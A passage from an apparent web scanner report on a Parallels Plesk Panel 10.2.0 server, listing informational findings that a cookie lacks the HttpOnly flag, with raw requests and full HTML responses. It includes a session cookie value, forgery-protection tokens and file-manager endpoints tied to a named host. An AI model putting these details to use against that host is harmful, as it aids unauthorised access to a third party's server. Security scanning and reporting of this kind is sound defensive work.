   <option value='oc-FR'>Occitan (France)</option>
   <option value='or-IN'>Oriya (India)</option>
   <option value='ps-AF'>Pashto (Afghanistan)</option>
   <option value='fa-IR'>Persian (Iran)</option>
   <option value='pl-PL'>Polish (Poland)</option>
   <option value='pt-BR'>Portuguese (Brazil)</option>
   <option value='pt-PT'>Portuguese (Portugal)</option>
   <option value='pa-IN'>Punjabi (India)</option>
   <option value='quz-BO'>Quechua (Bolivia)</option>
   <option value='quz-EC'>Quechua (Ecuador)</option>
   <option value='quz-PE'>Quechua (Peru)</option>
   <option value='ro-RO'>Romanian (Romania)</option>
   <option value='rm-CH'>Romansh (Switzerland)</option>
   <option value='ru-RU'>Russian (Russia)</option>
   <option value='smn-FI'>Sami (Inari) (Finland)</option>
   <option value='smj-NO'>Sami (Lule) (Norway)</option>
   <option value='smj-SE'>Sami (Lule) (Sweden)</option>
   <option value='se-FI'>Sami (Northern) (Finland)</option>
   <option value='se-NO'>Sami (Northern) (Norway)</option>
   <option value='se-SE'>Sami (Northern) (Sweden)</option>
   <option value='sms-FI'>Sami (Skolt) (Finland)</option>
   <option value='sma-NO'>Sami (Southern) (Norway)</option>
   <option value='sma-SE'>Sami (Southern) (Sweden)</option>
   <option value='sa-IN'>Sanskrit (India)</option>
   <option value='gd-GB'>Scottish Gaelic (United Kingdom)</option>
   <option value='sr-Cyrl-BA'>Serbian (Cyrillic) (Bosnia and Herzegovina)</option>
   <option value='sr-Cyrl-ME'>Serbian (Cyrillic) (Montenegro)</option>
   <option value='sr-Cyrl-RS'>Serbian (Cyrillic) (Serbia)</option>
   <option value='sr-Cyrl-CS'>Serbian (Cyrillic, Serbia and Montenegro (Former))</option>
   <option value='sr-Latn-BA'>Serbian (Latin) (Bosnia and Herzegovina)</option>
   <option value='sr-Latn-ME'>Serbian (Latin) (Montenegro)</option>
   <option value='sr-Latn-RS'>Serbian (Latin) (Serbia)</option>
   <option value='sr-Latn-CS'>Serbian (Latin, Serbia and Montenegro (Former))</option>
   <option value='nso-ZA'>Sesotho sa Leboa (South Africa)</option>
   <option value='tn-ZA'>Setswana (South Africa)</option>
   <option value='si-LK'>Sinhala (Sri Lanka)</option>
   <option value='sk-SK'>Slovak (Slovakia)</option>
   <option value='sl-SI'>Slovenian (Slovenia)</option>
   <option value='es-AR'>Spanish (Argentina)</option>
   <option value='es-BO'>Spanish (Bolivia)</option>
   <option value='es-CL'>Spanish (Chile)</option>
   <option value='es-CO'>Spanish (Colombia)</option>
   <option value='es-CR'>Spanish (Costa Rica)</option>
   <option value='es-DO'>Spanish (Dominican Republic)</option>
   <option value='es-EC'>Spanish (Ecuador)</option>
   <option value='es-SV'>Spanish (El Salvador)</option>
   <option value='es-GT'>Spanish (Guatemala)</option>
   <option value='es-HN'>Spanish (Honduras)</option>
   <option value='es-MX'>Spanish (Mexico)</option>
   <option value='es-NI'>Spanish (Nicaragua)</option>
   <option value='es-PA'>Spanish (Panama)</option>
   <option value='es-PY'>Spanish (Paraguay)</option>
   <option value='es-PE'>Spanish (Peru)</option>
   <option value='es-PR'>Spanish (Puerto Rico)</option>
   <option value='es-ES'>Spanish (Spain)</option>
   <option value='es-US'>Spanish (United States)</option>
   <option value='es-UY'>Spanish (Uruguay)</option>
   <option value='es-VE'>Spanish (Venezuela)</option>
   <option value='sv-FI'>Swedish (Finland)</option>
   <option value='sv-SE'>Swedish (Sweden)</option>
   <option value='syr-SY'>Syriac (Syria)</option>
   <option value='tg-Cyrl-TJ'>Tajik (Cyrillic) (Tajikistan)</option>
   <option value='tzm-Latn-DZ'>Tamazight (Latin) (Algeria)</option>
   <option value='ta-IN'>Tamil (India)</option>
   <option value='tt-RU'>Tatar (Russia)</option>
   <option value='te-IN'>Telugu (India)</option>
   <option value='th-TH'>Thai (Thailand)</option>
   <option value='bo-CN'>Tibetan (People&#039;s Republic of China)</option>
   <option value='tr-TR'>Turkish (Turkey)</option>
   <option value='tk-TM'>Turkmen (Turkmenistan)</option>
   <option value='uk-UA'>Ukrainian (Ukraine)</option>
   <option value='hsb-DE'>Upper Sorbian (Germany)</option>
   <option value='ur-PK'>Urdu (Islamic Republic of Pakistan)</option>
   <option value='ug-CN'>Uyghur (People&#039;s Republic of China)</option>
   <option value='uz-Cyrl-UZ'>Uzbek (Cyrillic, Uzbekistan)</option>
   <option value='uz-Latn-UZ'>Uzbek (Latin, Uzbekistan)</option>
   <option value='vi-VN'>Vietnamese (Vietnam)</option>
   <option value='cy-GB'>Welsh (United Kingdom)</option>
   <option value='wo-SN'>Wolof (Senegal)</option>
   <option value='sah-RU'>Yakut (Russia)</option>
   <option value='ii-CN'>Yi (People&#039;s Republic of China)</option>
   <option value='yo-NG'>Yoruba (Nigeria)</option>
   <option value='xh-ZA'>isiXhosa (South Africa)</option>
   <option value='zu-ZA'>isiZulu (South Africa)</option>
</select>








           </td>
       </tr>

   </table>

</td></tr></table></fieldset>

<fieldset>

<legend>Code Access Security</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-trust_level">CAS trust level</label></td>
           <td>



   <select name="trust_level" id="fid-trust_level" >    <option value='Full' SELECTED>Full</option>
   <option value='High'>High</option>
   <option value='Medium'>Medium</option>
   <option value='Low'>Low</option>
   <option value='Minimal'>Minimal</option>
</select>








           </td>
       </tr>

   </table>

</td></tr></table></fieldset>

<fieldset>

<legend>Session Settings</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-auth_mode">Authentication mode</label></td>
           <td>



   <select name="auth_mode" id="fid-auth_mode" >    <option value='Windows' SELECTED>Windows</option>
   <option value='Forms'>Forms</option>
   <option value='Passport'>Passport</option>
   <option value='None'>None</option>
</select>








           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-sess_timeout">Session timeout (minutes)</label></td>
           <td>





   <input type="text" name="sess_timeout" id="fid-sess_timeout" value="20"} size="15">





           </td>
       </tr>

   </table>

</td></tr></table></fieldset>


<input type="hidden" name="groupName" value="">
<input type="hidden" name="web_path" value="">

</div>
   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"></td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);update_oC(document.forms[0]); return false;;return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="button" onClick="Event.stop(event);update_oC(document.forms[0]); return false;;return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/hosting-panel=web.view/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/hosting-panel=web.view/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.22. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: psaContext (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&file=/httpdocs HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:22:33 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:34 GMT
Connection: close
Content-Length: 54609

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Ffile-manager%252F%253Fcmd%253Dchdir%2526file%253D%252Fhttpdocs%26src%3D%252Fsmb%252Fweb%252Fview%252Fid%252F1%252FsiteId%252F1%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>File Manager</span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/filemanager/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;


           function update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);

               return false;
           }

           function chmod_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "chmod";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function rename_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "rename";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function new_file_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_file";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/"
               lsubmit(f);

               return false;
           }

           function count_size_oC()
           {
               f = document.forms[0];
               f.cmd.value = "count_size";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function extract_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "extract";
               f.subcmd.value = "";
               lsubmit(f);
               return false;
           }

           function pack_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/pack/"
               lsubmit(f);

               return false;
           }

           function create_archive_oC() {
               f = document.forms[0];

               if ("" == f.archive_name.value) {
                   alert("Please enter file name.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "pack";
               lsubmit(f);

               return false;
           }

           function new_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_dir";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-dir/"
               lsubmit(f);

               return false;
           }

           function create_file_oC()
           {
               f = document.forms[0];
errorfield(f.new_file, false);

               if (f.create_file_method[0].checked) { // upload
                   f.cmd.value = "upload_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               if (f.create_file_method[1].checked) { // create
                   if (f.new_file.value == "") {
        errorfield(f.new_file, true);
                       alert("Some fields are empty or contain an improper value.");
                       f.new_file.focus();
                       return false;
                   }

                   f.cmd.value = "create_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               return false;
           }

           function create_file_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_file";
               f.subcmd.value = "save";
               lsubmit(f);

               return false;
           }

           function create_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_dir";
               f.file.value = f.new_dir.value;
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function edit_reset_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "";
               f.reset();
               return false;
           }

           function edit_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save";
               lsubmit(f);
               return false;
           }

           function edit_save_exit_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save_exit";
               lsubmit(f);
               return false;
           }

           function codepage_oC()
           {
               f = document.forms[0];
               f.subcmd.value = "codepage";
               lsubmit(f);
               return false;
           }

           function cancel_oC()
           {
               f = document.forms[0];
               f.cmd.value = "";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/"
               lsubmit(f);
               return false;
           }

           function touch_oC()
           {
               f = document.forms[0];

               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               if (!confirm("Are you sure you want to change the timestamp of the selected files?"))
                   return false;

               f.cmd.value="touch";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function copy_move_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="copy_move";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/copy-move/"
               lsubmit(f);

               return false;
           }

           function copy_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "copy";
               lsubmit(f);

               return false;
           }

           function move_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "move";
               lsubmit(f);

               return false;
           }

           function remove_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/remove/"
               lsubmit(f);

               return false;
           }

           function remove_submit_oC()
           {
               f = document.forms[0];
               if (!f.confirm.checked) {
                   alert("You must confirm deletion.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function check_selection()
           {
               f = document.forms[0];
               selected = 0;
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]") && f.elements[i].checked) {
                       selected++;
                   }
               }
               return selected;
           }

           function perm_click(t, id) {
               el = document.forms[0].elements;
               switch (t) {
               case "ra":
                   if (el["ra_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["wa_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "rd":
                   if (el["rd_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["wd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "wa":
                   if (el["wa_perm[" + id + "]"].checked) {
                       el["wd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "wd":
                   if (el["wd_perm[" + id + "]"].checked) {
                       el["wa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "xa":
                   if (el["xa_perm[" + id + "]"].checked) {
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["wa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "xd":
                   if (el["xd_perm[" + id + "]"].checked) {
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["wd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "fa":
                   if (el["fa_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = true;
                       el["wa_perm[" + id + "]"].checked = true;
                       el["xa_perm[" + id + "]"].checked = true;
                       el["rd_perm[" + id + "]"].checked = false;
                       el["wd_perm[" + id + "]"].checked = false;
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                   }
                   break;
               case "fd":
                   if (el["fd_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = true;
                       el["wd_perm[" + id + "]"].checked = true;
                       el["xd_perm[" + id + "]"].checked = true;
                       el["ra_perm[" + id + "]"].checked = false;
                       el["wa_perm[" + id + "]"].checked = false;
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                   }
                   break;

               }
           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f">
   <input type="hidden" name="cmd" value="">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   


<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <DIV class="commonButton" id="bid-create-dir" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_dir_oC();return false;" style=""><BUTTON name="bname_create_dir" id="buttonid-create-dir" type="button" onClick="Event.stop(event);new_dir_oC();return false;">Add New Directory</BUTTON><SPAN id="spanid-create-dir">Add New Directory</SPAN></DIV>
           <DIV class="commonButton" id="bid-create-file" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new file.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_file_oC();return false;" style=""><BUTTON name="bname_create_file" id="buttonid-create-file" type="button" onClick="Event.stop(event);new_file_oC();return false;">Add New File</BUTTON><SPAN id="spanid-create-file">Add New File</SPAN></DIV>
       </div>
       
   </td></tr></table></fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Files</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       
       <script>
           function a(event) { tooltip.set(event, [{"type":"string","string":"Edit the file."}]); }
           function b(event) { tooltip.set(event, [{"type":"string","string":"View the file."}]); }
           function c(event) { tooltip.set(event, [{"type":"string","string":"i_filemanager__chdir"}]); }
           function d(event) { tooltip.set(event, [{"type":"string","string":"Change access rights to the file or directory."}]); }
           function e(event) { tooltip.set(event, [{"type":"string","string":"Change the file or directory name."}]); }
           function f(event, type) {
               switch (type) {
                   case "pdir":
                       tooltip.set(event, [{"type":"string","string":"Go to the directory one level up."}]);
                       break;
                   case "dir":
                       tooltip.set(event, [{"type":"string","string":"Go inside the directory."}]);
                       break;
                   case "text":
                       tooltip.set(event, [{"type":"string","string":"View the text file contents."}]);
                       break;
                   case "image":
                       tooltip.set(event, [{"type":"string","string":"View the image."}]);
                       break;
                   case "audio":
                       tooltip.set(event, [{"type":"string","string":"Audio file."}]);
                       break;
                   case "security":
                       tooltip.set(event, [{"type":"string","string":"Apache security file."}]);
                       break;
                   case "webscript":
                       tooltip.set(event, [{"type":"string","string":"Webscript page file."}]);
                       break;
                   case "wappage":
                       tooltip.set(event, [{"type":"string","string":"WAP page file."}]);
                       break;
                   case "webpage":
                       tooltip.set(event, [{"type":"string","string":"Web page file."}]);
                       break;
                   case "compressed":
                       tooltip.set(event, [{"type":"string","string":"Compressed file."}]);
                       break;
                   case "unknown_text":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (text data)."}]);
                       break;
                   case "unknown_binary":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (binary data)."}]);
                       break;
               }
           }
           function g(event) { tooltip.set(event, [{"type":"string","string":"Edit the file in a visual editor."}]); }
           function h(event) { tooltip.set(event, [{"type":"string","string":"Editing the file in a visual editor requires Internet Explorer version 5.5 or later."}]); }
           function i(event) { tooltip.set(event, [{"type":"string","string":"Open the file in a browser."}]); }
           function download_hint(event) { tooltip.set(event, [{"type":"string","string":"Download the file."}]); }
           function z() { tooltip.hide(); }

           function bin() { return confirm("This file may be a binary file. Do you want to open it?"); }
       </script>

   </td></tr></table></fieldset>

   <div class="footnote"></div>
</div>
<input type="hidden" name="file" value="">
<input type="hidden" name="subcmd" value="">
</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.23. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/create-file/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/create-file/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /plesk/client@2/domain@1/hosting/file-manager/create-file/ HTTP/1.1
